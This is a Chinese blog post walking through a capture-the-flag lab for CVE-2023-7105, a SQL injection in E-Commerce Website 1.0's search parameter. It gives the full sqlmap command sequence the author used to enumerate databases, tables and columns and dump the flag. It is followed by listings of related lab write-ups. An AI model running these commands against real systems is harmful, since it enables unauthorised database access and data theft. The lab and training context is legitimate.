春秋云境 | SQL | CVE-2023-7105

最新推荐文章于 2024-10-13 21:00:27 发布
最新推荐文章于 2024-10-13 21:00:27 发布
阅读量241 收藏 1
点赞数 13
分类专栏: 春秋云境靶场 文章标签: sql 数据库 web安全 网络安全 安全 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_68416970/article/details/141089602
版权

目录

靶标介绍

开启靶场

sqlmap 获取所有数据库名

sqlmap 获取当前数据库名

sqlmap 获取数据库中的表

sqlmap 获取表中字段名

sqlmap 获取表中数据

靶标介绍

E-Commerce Website 1.0 允许通过“index_search.php”中的参数“search”进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序,访问或修改数据,或者利用底层数据库中的最新漏洞。

开启靶场

往下滑发现一个搜索框,输入 1,然后用 Burp 在抓包

数据包如下,放进文本文档,重命名为 test.txt 放到桌面

sqlmap 获取所有数据库名

利用 sqlmap 跑 test.txt

python sqlmap.py -r "D:\desktop\test.txt" --batch --dbs

发现一共有 4 个数据库

sqlmap 获取当前数据库名

python sqlmap.py -r "D:\desktop\test.txt" --batch --current-db

发现了当前数据库名是 electricks

sqlmap 获取数据库中的表

python sqlmap.py -r "D:\desktop\test.txt" --batch -D electricks --tables

发现了可疑表名 flllaaaag

sqlmap 获取表中字段名

python sqlmap.py -r "D:\desktop\test.txt" --batch -D electricks -T flllaaaag --columns

发现了字段名是 flag,看来是找对了

sqlmap 获取表中数据

python sqlmap.py -r "D:\desktop\test.txt" --batch -D electricks -T  flllaaaag -C flag --dump

得到了本关的 flag

燕雀安知鸿鹄之志哉.
关注
专栏目录
春秋云境 CVE-2022-4230 夺旗
05-02
### 春秋云境 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁
01-19
针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响...
春秋云境 | SQL | CVE-2023-0562
weixin_68416970的博客
08-11 390
银行储物柜管理系统是一个基于网络的应用程序,用于处理存储银行客户贵重物品的银行储物柜。储物柜的所有详细信息都保存在数据库中。银行储物柜管理系统项目是使用 PHP 和 MySQLi 扩展开发的。
春秋云境 | SQL | CVE-2023-2130
weixin_68416970的博客
08-10 504
在SourceCodester采购订单管理系统1.0中发现了一项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。可以远程发起攻击。
春秋云境 | SQL | CVE-2022-4230
weixin_68416970的博客
08-10 801
WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认情况下,具有管理选项功能 (admin+) 的用户可以使用受影响的功能,但是该插件有一个设置允许低权限用户也可以访问它。WP Statistics < 13.2.9 – 经过身份验证的 SQLi |CVE 2022-4230 |插件漏洞 (wpscan.com),有兴趣可以了解下。
春秋云境 | SQL | CVE-2023-7107
weixin_68416970的博客
08-11 463
E-Commerce Website 1.0 允许通过“/pages/user_signup.php”中的参数‘firstname’、‘middlename’、‘email’、‘address’、‘contact’和‘username’进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序,访问或修改数据,或者利用底层数据库中的最新漏洞。
春秋云境 | SQL | CVE-2023-7106
weixin_68416970的博客
08-12 687
E-Commerce Website 1.0 允许通过“/pages/product_details.php”中的参数“prod_id”进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序,访问或修改数据,或者利用底层数据库中的最新漏洞。
春秋云境 | SQL | CVE-2023-7130
weixin_68416970的博客
08-11 356
College Notes Gallery 2.0 允许通过“/notes/login.php”中的参数‘user’进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序,访问或修改数据。
春秋云境CVE-2023-7105
2303_76653367的博客
05-09 517
E-Commerce Website 1.0 允许通过“index_search.php”中的参数“search”进行 SQL 注入。利用这个问题可能会使攻击者有机会破坏应用程序,访问或修改数据,或者利用底层数据库中的最新漏洞.3.保存POST包,sqlmap跑,爆库。2.下拉找到搜索框,随便输入,抓包。
春秋云境靶场之CVE-2022-32991
qq_58091216的博客
09-13 641
提示我们存在SQL,那么我们就进行SQL注入。
春秋云境靶场之CVE-2023-2130
sjh0590的博客
09-18 317
春秋云境靶场之CVE-2023-2130攻克过程
OpenSSH(CVE-2023-38408)一键升级修复-OpenSSH9.5p1
10-17
2023年,OpenSSH发现了一个名为CVE-2023-38408的安全漏洞,这个漏洞可能允许攻击者在特定条件下绕过身份验证或执行未授权的操作,对系统安全构成威胁。为了保护您的系统不受此漏洞影响,及时升级到OpenSSH 9.5p1...
SQL Injection | MySQL 数据库概述
Blue17 の 小窝
10-12 2108
MySQL 是一个流行的关系型数据库管理系统(RDBMS),它基于 SQL (Structured Query Language)进行操作。MySQL 是由瑞典 MySQL AB 公司开发的,后来被 Sun Microsystems 收购,最终称为 Oracle 公司的产品。它是一个开源项目,遵循 GNU 通用公共许可证(GPL)发布,同时也提供了商业许可。
awk脚本通过将多行拼接成一行并在 SQL 语句的末尾遇到分号(;)时打印出来
u010674101的专栏
10-10 427
这个awk脚本处理 SQL 查询语句时,会识别SELECTUPDATEDELETE和INSERT开头的 SQL 语句,并将可能分布在多行的 SQL 语句拼接成一行,直到遇到分号结束语句。脚本中的其他内容则会原样输出。
QT开发--QT SQL模块
最新发布
荒野
10-13 1143
qt5
PostgreSQL技术内幕14:从插件来看PG扩展性-FDW插件
qq_40529346的博客
10-13 1075
PG具有很好的扩展性,通过代码内部使用的函数指针,不同层级之间的标准接口,通过SQL语句创建的不同配置等实现其不改动核心代码而直接的扩展,本文是PG插件部分的第一篇,主要介绍FDW插件,从FDW插件的角度来分析PG的通过插件实现功能扩展。
LlamaIndex 结构化数据库交互指南增强(text2sql
洛阳泰山的博客
10-10 1328
许多现代数据系统都依赖于结构化数据,例如或Snowflake数据仓库。LlamaIndex提供了许多由LLM提供支持的高级功能,可以从中创建结构化数据 非结构化数据,以及通过增强的文本到 SQL 功能分析这些结构化数据。:任何应用程序都应该意识到,执行 任意SQL查询可能存在安全风险。建议 根据需要采取预防措施,例如使用受限角色、只读 数据库、沙箱等。本指南帮助介绍这些功能中的每一项。SQLsql
春秋云境CVE-2022-29464
07-28
- *1* [【春秋云境CVE-2022-29464](https://blog.csdn.net/ZXW_NUDT/article/details/129159816)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值